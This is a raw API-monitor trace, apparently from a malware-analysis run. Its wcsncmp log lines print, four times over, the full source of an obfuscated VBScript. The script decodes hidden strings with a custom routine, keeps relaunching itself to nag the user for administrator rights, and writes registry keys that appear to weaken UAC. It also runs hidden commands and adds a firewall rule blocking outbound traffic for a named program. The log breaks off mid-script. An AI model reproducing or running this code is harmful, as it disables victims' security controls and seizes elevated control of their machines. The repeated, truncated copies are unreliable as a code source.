CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.282] wcsncmp (_String1="fheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0226.282] wcsncmp (_String1="heCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0226.283] wcsncmp (_String1="eCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.283] wcsncmp (_String1="CHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf 